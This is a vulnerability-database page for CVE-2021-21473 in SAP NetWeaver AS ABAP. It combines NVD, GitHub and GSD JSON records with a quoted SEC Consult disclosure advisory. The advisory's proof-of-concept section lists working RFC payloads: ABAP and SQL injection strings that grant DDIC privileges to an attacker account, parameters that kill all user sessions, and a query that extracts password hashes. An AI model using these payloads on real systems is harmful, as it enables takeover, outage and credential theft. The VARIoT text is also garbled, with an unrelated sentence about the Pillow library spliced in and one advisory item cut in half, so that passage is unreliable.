af854a3a-2127-422b-91ae-364da2661108	https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999	Vendor Advisory

Impacted products

Vendor	Product	Version
sap	netweaver_application_server_abap	700
sap	netweaver_application_server_abap	702
sap	netweaver_application_server_abap	710
sap	netweaver_application_server_abap	711
sap	netweaver_application_server_abap	730
sap	netweaver_application_server_abap	731
sap	netweaver_application_server_abap	740
sap	netweaver_application_server_abap	750
sap	netweaver_application_server_abap	751
sap	netweaver_application_server_abap	752
sap	netweaver_application_server_abap	753
sap	netweaver_application_server_abap	754
sap	netweaver_application_server_abap	755

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:700:*:*:*:*:*:*:*",
              "matchCriteriaId": "C5A3C915-0E5F-4B1A-B1EB-5ADEA517F620",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:702:*:*:*:*:*:*:*",
              "matchCriteriaId": "706FEB9E-3EE9-405E-A8C9-733DAF68AC6D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:710:*:*:*:*:*:*:*",
              "matchCriteriaId": "9B5BF1EC-C2A6-486B-8E63-0A7ED431C1F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:711:*:*:*:*:*:*:*",
              "matchCriteriaId": "17847B21-8BE6-4359-913B-B6592D37C655",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:730:*:*:*:*:*:*:*",
              "matchCriteriaId": "2F1B47E4-C4E3-4D79-9048-EF6A82B8085E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:731:*:*:*:*:*:*:*",
              "matchCriteriaId": "5CC29738-CF17-4E6B-9C9E-879B17F7E001",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:740:*:*:*:*:*:*:*",
              "matchCriteriaId": "127E508F-6CC1-41C8-96DF-8D14FFDD4020",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:750:*:*:*:*:*:*:*",
              "matchCriteriaId": "7777AA80-1608-420E-B7D5-09ABECD51728",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:751:*:*:*:*:*:*:*",
              "matchCriteriaId": "0539618A-1C4D-463F-B2BB-DD1C239C23EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:752:*:*:*:*:*:*:*",
              "matchCriteriaId": "62828DCD-F80E-4C7C-A988-EFEA06A5223E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:753:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9F38585-73AE-4DBB-A978-F0272DF8FB58",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:754:*:*:*:*:*:*:*",
              "matchCriteriaId": "D416C064-BB8A-4230-A761-84A93E017F79",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:755:*:*:*:*:*:*:*",
              "matchCriteriaId": "6B8D3EA0-28E6-4333-8C67-B9D3775EB9BC",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SAP NetWeaver AS ABAP and ABAP Platform, versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contains function module SRM_RFC_SUBMIT_REPORT which fails to validate authorization of an authenticated user thus allowing an unauthorized user to execute reports in SAP NetWeaver ABAP Platform."
    },
    {
      "lang": "es",
      "value": "SAP NetWeaver AS ABAP y ABAP Platform, versiones - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contiene el m\u00f3dulo de funci\u00f3n SRM_RFC_SUBMIT_REPORT que no comprueba la autorizaci\u00f3n de un usuario autenticado por lo tanto permitir a un usuario no autorizado ejecutar reportes en la plataforma SAP NetWeaver ABAP"
    }
  ],
  "id": "CVE-2021-21473",
  "lastModified": "2024-11-21T05:48:26.590",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 6.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.4,
        "source": "cna@sap.com",
        "type": "Secondary"
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 6.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.4,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-06-09T14:15:07.977",
  "references": [
    {
      "source": "cna@sap.com",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/167229/SAP-Application-Server-ABAP-ABAP-Platform-Code-Injection-SQL-Injection-Missing-Authorization.html"
    },
    {
      "source": "cna@sap.com",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2022/May/42"
    },
    {
      "source": "cna@sap.com",
      "tags": [
        "Permissions Required",
        "Vendor Advisory"
      ],
      "url": "https://launchpad.support.sap.com/#/notes/3002517"
    },
    {
      "source": "cna@sap.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/167229/SAP-Application-Server-ABAP-ABAP-Platform-Code-Injection-SQL-Injection-Missing-Authorization.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2022/May/42"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Permissions Required",
        "Vendor Advisory"
      ],
      "url": "https://launchpad.support.sap.com/#/notes/3002517"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999"
    }
  ],
  "sourceIdentifier": "cna@sap.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-862"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-38GP-JHV5-4HGH

Vulnerability from github – Published: 2022-05-24 19:04 – Updated: 2022-05-24 19:04

Details

Severity

6.3 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2021-21473"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-06-09T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "SAP NetWeaver AS ABAP and ABAP Platform, versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contains function module SRM_RFC_SUBMIT_REPORT which fails to validate authorization of an authenticated user thus allowing an unauthorized user to execute reports in SAP NetWeaver ABAP Platform.",
  "id": "GHSA-38gp-jhv5-4hgh",
  "modified": "2022-05-24T19:04:40Z",
  "published": "2022-05-24T19:04:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21473"
    },
    {
      "type": "WEB",
      "url": "https://launchpad.support.sap.com/#/notes/3002517"
    },
    {
      "type": "WEB",
      "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/167229/SAP-Application-Server-ABAP-ABAP-Platform-Code-Injection-SQL-Injection-Missing-Authorization.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2022/May/42"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GSD-2021-21473

Vulnerability from gsd - Updated: 2023-12-13 01:23

Details

Aliases

CVE-2021-21473

Aliases

CVE-2021-21473

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2021-21473",
    "description": "SAP NetWeaver AS ABAP and ABAP Platform, versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contains function module SRM_RFC_SUBMIT_REPORT which fails to validate authorization of an authenticated user thus allowing an unauthorized user to execute reports in SAP NetWeaver ABAP Platform.",
    "id": "GSD-2021-21473",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2021-21473"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2021-21473"
      ],
      "details": "SAP NetWeaver AS ABAP and ABAP Platform, versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contains function module SRM_RFC_SUBMIT_REPORT which fails to validate authorization of an authenticated user thus allowing an unauthorized user to execute reports in SAP NetWeaver ABAP Platform.",
      "id": "GSD-2021-21473",
      "modified": "2023-12-13T01:23:11.249236Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cna@sap.com",
        "ID": "CVE-2021-21473",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "SAP NetWeaver AS ABAP and ABAP Platform (SRM_RFC_SUBMIT_REPORT)",
                    "version": {
                      "version_data": [
                        {
                          "version_name": "\u003c",
                          "version_value": "700"
                        },
                        {
                          "version_name": "\u003c",
                          "version_value": "702"
                        },
                        {
                          "version_name": "\u003c",
                          "version_value": "710"
                        },
                        {
                          "version_name": "\u003c",
                          "version_value": "711"
                        },
                        {
                          "version_name": "\u003c",
                          "version_value": "730"
                        },
                        {
                          "version_name": "\u003c",
                          "version_value": "731"
                        },
                        {
                          "version_name": "\u003c",
                          "version_value": "740"
                        },
                        {
                          "version_name": "\u003c",
                          "version_value": "750"
                        },
                        {
                          "version_name": "\u003c",
                          "version_value": "751"
                        },
                        {
                          "version_name": "\u003c",
                          "version_value": "752"
                        },
                        {
                          "version_name": "\u003c",
                          "version_value": "753"
                        },
                        {
                          "version_name": "\u003c",
                          "version_value": "754"
                        },
                        {
                          "version_name": "\u003c",
                          "version_value": "755"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "SAP SE"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "SAP NetWeaver AS ABAP and ABAP Platform, versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contains function module SRM_RFC_SUBMIT_REPORT which fails to validate authorization of an authenticated user thus allowing an unauthorized user to execute reports in SAP NetWeaver ABAP Platform."
          }
        ]
      },
      "impact": {
        "cvss": {
          "baseScore": "6.3",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
          "version": "3.0"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "Missing Authorization"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999",
            "refsource": "MISC",
            "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999"
          },
          {
            "name": "https://launchpad.support.sap.com/#/notes/3002517",
            "refsource": "MISC",
            "url": "https://launchpad.support.sap.com/#/notes/3002517"
          },
          {
            "name": "20220518 SEC Consult SA-20220518-0 :: Multiple Critical Vulnerabilities in SAP Application Server, ABAP and ABAP Platform (Different Software Components)",
            "refsource": "FULLDISC",
            "url": "http://seclists.org/fulldisclosure/2022/May/42"
          },
          {
            "name": "http://packetstormsecurity.com/files/167229/SAP-Application-Server-ABAP-ABAP-Platform-Code-Injection-SQL-Injection-Missing-Authorization.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/167229/SAP-Application-Server-ABAP-ABAP-Platform-Code-Injection-SQL-Injection-Missing-Authorization.html"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:702:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:750:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:752:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:753:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:754:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:755:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:700:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:710:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:730:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:731:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:711:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:740:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_abap:751:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cna@sap.com",
          "ID": "CVE-2021-21473"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "SAP NetWeaver AS ABAP and ABAP Platform, versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contains function module SRM_RFC_SUBMIT_REPORT which fails to validate authorization of an authenticated user thus allowing an unauthorized user to execute reports in SAP NetWeaver ABAP Platform."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-862"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://launchpad.support.sap.com/#/notes/3002517",
              "refsource": "MISC",
              "tags": [
                "Permissions Required",
                "Vendor Advisory"
              ],
              "url": "https://launchpad.support.sap.com/#/notes/3002517"
            },
            {
              "name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999",
              "refsource": "MISC",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999"
            },
            {
              "name": "20220518 SEC Consult SA-20220518-0 :: Multiple Critical Vulnerabilities in SAP Application Server, ABAP and ABAP Platform (Different Software Components)",
              "refsource": "FULLDISC",
              "tags": [
                "Exploit",
                "Mailing List",
                "Third Party Advisory"
              ],
              "url": "http://seclists.org/fulldisclosure/2022/May/42"
            },
            {
              "name": "http://packetstormsecurity.com/files/167229/SAP-Application-Server-ABAP-ABAP-Platform-Code-Injection-SQL-Injection-Missing-Authorization.html",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://packetstormsecurity.com/files/167229/SAP-Application-Server-ABAP-ABAP-Platform-Code-Injection-SQL-Injection-Missing-Authorization.html"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 8.0,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.4
        }
      },
      "lastModifiedDate": "2022-10-05T14:16Z",
      "publishedDate": "2021-06-09T14:15Z"
    }
  }
}

VAR-202106-0705

Vulnerability from variot - Updated: 2022-09-30 20:13

SAP NetWeaver AS ABAP and ABAP Platform, versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contains function module SRM_RFC_SUBMIT_REPORT which fails to validate authorization of an authenticated user thus allowing an unauthorized user to execute reports in SAP NetWeaver ABAP Platform. SAP NetWeaver AS for ABA and ABAP Platform Is vulnerable to a lack of authentication.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. SEC Consult Vulnerability Lab Security Advisory < 20220518-0 > ======================================================================= title: Multiple Critical Vulnerabilities product: SAP® Application Server ABAP and ABAP® Platform (Different Software Components) vulnerable version: see section "Vulnerable / tested versions" fixed version: see SAP security notes 2958563, 2973735, 2993132, 2986980, 2999854, 3002517, 3048657 CVE number: CVE-2020-6318, CVE-2020-26808, CVE-2020-26832, CVE-2021-21465, CVE-2021-21468, CVE-2021-21466, CVE-2021-21473, CVE-2021-33678 impact: critical homepage: https://www.sap.com found: 08/2020 - 02/2021 by: Fabian Hagg (Office Vienna) Alexander Meier (Office Berlin) SEC Consult Vulnerability Lab

                  An integrated part of SEC Consult, an Atos company
                  Europe | Asia | North America

                  https://www.sec-consult.com

=======================================================================

Vendor description:

"SAP is a market share leader in enterprise resource planning (ERP), analytics, supply chain management, human capital management, master data management, data integration as well as in experience management" [1]. Customers comprise 92% of the Forbes Global 2000 companies and 98% of the 100 most valued brands. 77% of the world’s transaction revenue touches an SAP system [1, 2].

"SAP NetWeaver Application Server for ABAP (AS ABAP) is a platform on which important business processes run. It provides a complete development and runtime environment for ABAP-based applications. The purpose of AS ABAP is to provide programmers with an efficient means of expressing business logic and relieve them from the necessity of platform-related and purely technical coding. AS ABAP is therefore a basis for all ABAP systems" [3].

"The [successor] ABAP platform provides a reliable and scalable server and programming environment for modern ABAP development [...]. The ABAP platform offers support for SAP HANA and SAP Fiori and allows developers to efficiently build enterprise software that meets the requirements of their business scenarios – on-premise as well as in the cloud" [4].

[1] https://www.sap.com/about/company.html [2] https://www.sap.com/documents/2017/04/4666ecdd-b67c-0010-82c7-eda71 af511fa.html [3] https://help.sap.com/viewer/ff18034f08af4d7bb33894c2047c3b71/7.52.5/ en-US/797de8aa42e24916953c4bb3d983662d.html [4] https://developers.sap.com/topics/abap-platform.html

Business recommendation:

By exploiting the vulnerabilities documented in this advisory, privileged attackers can take complete control of affected application servers. Thus, successful exploitation can enable fraud, sabotage or data theft while affecting confidentiality, integrity, and availability of business data.

SEC Consult recommends to implement security notes 2958563, 2973735, 2993132, 2986980, 2999854, 3002517, 3048657 where the documented issues are fixed according to the vendor. We advise installing the corrections as a matter of priority to keep business-critical data secured.

Vulnerability overview/description:

Advanced Business Application Programming (ABAP)® is a proprietary programming language by SAP SE. In common with every other programming language, ABAP can be susceptible to software vulnerabilities ranging from missing or improper authorization checks to inadequate input validation and output sanitization. Of particular concern are injection vulnerabilities, which can jeopardize the overall system security.

Remote Function Call (RFC) is a proprietary network protocol by SAP SE. Comparable to application programming interfaces (APIs), SAP systems come with thousands of built-in function modules implemented in ABAP. RFC allows remote-enabled functions to be accessed via the network. This makes it possible to decentralize business applications even across system boundaries. External programs and external clients can make use of RFC connections to interact with an SAP system via libraries (e.g. NW RFC SDK) provisioned by SAP SE.

This advisory covers multiple critical vulnerabilities discovered in the ABAP® coding of standard function modules. These are part of different software components that build upon the bedrock products SAP® Application Server ABAP and ABAP® Platform.

1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver (ABAP Server) and ABAP Platform

Function modules RSDU_LIST_DB_TABLE_SYB and RSDU_LIST_DB_TABLE_DB4
of function groups RSDU_UTIL_SYB and RSDU_CORE_UTIL_DB4 are vulnerable
to ABAP code injection bugs allowing to execute arbitrary ABAP
code. Successful exploitation leads to full system compromise.

2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP and S/4 HANA (DMIS)

Function module CNV_MBT_SEL_STRING_RETURN of function group
CNV_MBT_SEL is vulnerable to an ABAP code injection bug allowing to
embed arbitrary code into the ABAP Repository. An attacker can abuse
this bug by invoking the function remotely via the RFC protocol. 
Successful exploitation leads to full system compromise.

3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver AS ABAP and SAP S4 HANA (SAP Landscape Transformation)

Function module CNV_GET_USERS_FOR_APP_SERVER of function group
CNV_00001_HELP does not perform any programmatically implemented
authorization check. An attacker can abuse this bug by invoking
the function remotely via the RFC protocol. Successful exploitation
allows to retrieve internal information and to make a targeted SAP
system completely unavailable to its intended users. The latter
is to be considered as a Denial of Service (DoS) attack.

4) [CVE-2021-21468] Missing Authorization Check in SAP Business Warehouse (Database Interface)

Function module RSDL_DB_GET_DATA_BWS of function group RSDL does
not perform any programmatically implemented authorization check. 
An attacker can abuse this bug by invoking the function remotely
via the RFC protocol. Successful exploitation allows to read out
the entire database including cross-client data access.

5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP Business Warehouse (Database Interface)

Function module RSDL_DB_GET_DATA_BWS of function group RSDL is
vulnerable to a native SQL injection (ADBC) bug allowing to execute
arbitrary SQL commands at database level. An attacker can abuse
this bug by invoking the function remotely via the RFC protocol. 
Successful exploitation leads to full system compromise.

6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business Warehouse and SAP BW/4HANA

Function module RSDRI_DF_TEXT_READ of function group RSDRI_DF_FACADE
is vulnerable to an ABAP code injection bug allowing to embed
arbitrary code into the ABAP Repository. An attacker can abuse this
bug by invoking the function remotely via the RFC protocol. Successful
exploitation leads to full system compromise. An attacker can abuse this bug by invoking the function remotely
via the RFC protocol. Successful exploitation allows an attacker to
execute existing ABAP reports without holding sufficient authorizations.

8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP (Reconciliation Framework)

Function module CONVERT_FROM_CHAR_SORT_RFW of function group FG_RFW contains
a code injection vulnerability with a limited exploitation primitive. An
attacker can abuse this bug to delete critical system tables (e.g. USR02),
making the targeted SAP system completely unavailable to its intended users.

Proof of concept:

1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver (ABAP Server) and ABAP Platform

The vulnerable functions make use of the GENERATE SUBROUTINE POOL
instruction by providing source code that is created dynamically
using untrusted user input. As there is no input validation or
output sanitization, an attacker can inject malicious ABAP code
through specific import parameters. This code gets executed on the
fly by the application server in the course of execution of the
functions.

The following payload exploits the bug to escalate privileges via
reference user assignment:

Import Parameter:        I_TABLNM
Value:                   USR02

Import Table: I_T_SELECT_FIELDS
 ╒═══════════════════════════════════════════════════════════════╕
 │ RSD_FIELDNM                                                   │
 ╞═══════════════════════════════════════════════════════════════╡
 │ BNAME                                                         │
 ╘═══════════════════════════════════════════════════════════════╛
Import Table: I_T_WHERE_COND
 ╒═══════════╤══════╤════════════════════════════════════════════╕
 │ FIELDNM   │ OP   │ LOW                                        │
 ╞═══════════╪══════╪════════════════════════════════════════════╡
 │ BNAME     │ EQ   │ S'ENDEXEC. EXEC SQL.UPDATE USREFUS SET     │
 │           │      │ REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER   │
 ╘═══════════╧══════╧════════════════════════════════════════════╛

2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP and S/4 HANA (DMIS)

The vulnerable function makes use of the INSERT REPORT instruction
by providing source code that is created dynamically using untrusted
user input. As there is no input validation or output sanitization,
an attacker can inject malicious ABAP code through specific import
parameters. Inserted code may be executed by chaining this bug with
CVE-2021-21473.

The following payload exploits the bug to escalate privileges via
reference user assignment:

Import Parameter:    TABNAME
Value:               USR02

Import Table: IMT_SELSTRING
 ╒══════════════════════════════════════════════════════════════╕
 │ LINE                                                         │
 ╞══════════════════════════════════════════════════════════════╡
 │ BNAME = 'TEST'. ENDSELECT.                                   │
 ├──────────────────────────────────────────────────────────────┤
 │ UPDATE USREFUS SET REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER' │
 ├──────────────────────────────────────────────────────────────┤
 │ SELECT * FROM USR02                                          │
 ╘══════════════════════════════════════════════════════════════╛

3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver AS ABAP and SAP S4 HANA (SAP Landscape Transformation)

The vulnerable function does not perform any explicit authorization
check. Depending on a specific import parameter, the function leaks
active logon sessions (opcode 02) or terminates all active logon
sessions (opcode 25) by kernel call 'ThUsrInfo'. Invoking the function
periodically prevents users from logging into the application server.

The following payload exploits the bug to trigger the information
disclosure and enumerate active user sessions:

Import Parameter:   MODE
Value:               1

The following payload exploits the bug to terminate all active user
sessions:

Import Parameter:   MODE
Value:               2

4) [CVE-2021-21468] Missing Authorization Check in SAP Business Warehouse (Database Interface)

The vulnerable function does not perform any explicit authorization
check. It uses predefined classes and methods from the ABAP Database
Connectivity (ADBC) framework to execute native SQL queries at database
level. Depending on specific import parameters, this allows to read out
arbitrary table data including user master records or secure storages
(e.g. RSECTAB).

The following payload exploits the bug to exfiltrate user password
hashes:

Import Table: I_S_TABSEL
 ╒══════════════════════════════════════════════════════════════╕
 │ NAME                                                         │
 ╞══════════════════════════════════════════════════════════════╡
 │ USR02                                                        │
 ╘══════════════════════════════════════════════════════════════╛
Import Table: I_S_DBCON
 ╒══════════════════════════════════════════════════════════════╕
 │ CON_NAME                                                     │
 ╞══════════════════════════════════════════════════════════════╡
 │ <Database Connection String> (e.g. DEFAULT)                  │
 ╘══════════════════════════════════════════════════════════════╛
Import Table: I_T_DBFIELDS
 ╒═══════════════╤═════════╤════════════════════════════════════╕
 │ NAME          │ TYPE    │   LENGTH                           │
 ╞═══════════════╪═════════╪════════════════════════════════════╡
 │ BNAME         │ CHAR255 │   000255                           │
 ├───────────────┼─────────┼────────────────────────────────────┤
 │ PWDSALTEDHASH │ CHAR255 │   000255                           │
 ╘══════════════════════════════════════════════════════════════╛

